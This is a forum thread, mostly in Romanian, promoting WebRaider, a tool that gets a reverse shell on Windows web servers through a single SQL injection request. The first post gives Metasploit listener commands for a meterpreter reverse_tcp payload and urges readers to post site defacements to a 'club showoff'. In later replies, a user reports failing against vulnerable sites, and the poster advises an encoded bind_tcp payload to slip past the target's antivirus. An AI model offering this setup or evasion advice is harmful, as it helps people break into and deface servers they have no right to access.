Jump to content
begood

WebRaider: The One Click Ownage!

Recommended Posts

Posted (edited)

f80ae72c81856df3582e67928c2c7bac.png

We have been waiting on Mr. Mavituna on releasing WebRaider, since the first day we heard him talk about it. Now, it is finally out and is open source! We were waiting for something like this because as of now, other tools that perform a similar function have different dependencies. This one has depends on the tool that we already rely on.

So, what is so special about this tool. For starters, this tool has sponsorship from NetSparker, the tool that claims to be false positive free! Second, it uses a stripped down version of Metasploit! Third, it involves only one request for exploitation and is therefore faster! Infact, the idea of behind this tool is simple – get a reverse shell from an SQL Injection without using TFTP, FTP, etc. to upload the initial payload!

Here are a few features of WebRaider:

* It’s only one request therefore faster,

* Simple, you don’t need a tool you can do it manually by using your browser or a simple MITM proxy,

* just copy paste the payload,

* CSRF(able), It’s possible to craft a link and carry out a CSRF attack that will give you a reverse shell

* It’s not fixed, you can change the payload,

* It’s short, Generally not more than 3.500 characters,

* Doesn’t require any application on the target system like FTP, TFTP or debug.exe

* Easy to automate.

Normally during an SQL exploitation, we have to depend on tools such as debug.exe and the HTTP protocol limitation of 64kb’s etc. Now, all of this is easy with WebRaider. It does it all! WebRaider uses a VBScript to encode and decode the binary data, add some more functions that will make this work when executed on the target system, arrange this SQL injection on one line and that is all!

We haven’t had much time to play around with this beauty. We will keep you updated as and when we play with this! Download WebRaider version 0.2.3.7 here.

Edited by begood
Posted (edited)

upload payload via sqli

custom listener examples

 CustomListenerSamples   
Bash

#!/bin/sh
msfcli3 exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=[YOURIP] LPORT=[PORT] E

Windows Batch

ruby.exe msfcli exploit/multi/handler LHOST=[YOURIP] LPORT=[PORT] PAYLOAD=windows/meterpreter/reverse_tcp E

i.e.

"D:\Program Files\Metasploit\Framework3\bin\ruby.exe" "D:\Documents and Settings\UserXP\Application Data\msf32\msfcli" exploit/multi/handler LHOST=12.12.12.72 LPORT=6666 PAYLOAD=windows/meterpreter/reverse_tcp E

Whitepaper

Weaponized SQLi

//A new haxor generation will rise//

Sa vad cat mai multe deface-uri postate la "club showoff" !

PS: payloadurile le poti face in metasploit, merge si pe linux si pe windows.

Edited by begood
Guest Nemessis
Posted

Probabil sunt eu idiot dar nu imi pwneaza shell cu toate ca i-am dat site-uri vulnerabile.

Posted
Probabil sunt eu idiot dar nu imi pwneaza shell cu toate ca i-am dat site-uri vulnerabile.

payloadul default e pentru servere care ruleaza pe windows. ai verificat ?

Guest Nemessis
Posted

Da. Asp cu mysql instalat. Ai vreun site pe care ai testat tu si pe care a functionat?

Posted (edited)
Da. Asp cu mysql instalat. Ai vreun site pe care ai testat tu si pe care a functionat?

poate serverul ruleaza un antivirus, de ce nu generezi un custom payload cu metasploit. encoding = shikata_ga_nai ... sa zicem bind_tcp pentru a nu fi detectat de av.

uite tutoriale folositoare

lista de shellcodes : http://milw0rm.com/shellcode/

n-am testat inca, trebuie sa fac rost de un vpn intai.

LE: INCA CEVA http://www.mavitunasecurity.com/blog/webraider/

Edited by begood
Guest Nemessis
Posted

I hate metasploit :(

Cand ma trezesc din somn o sa imi mai prind urechile putin prin el.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...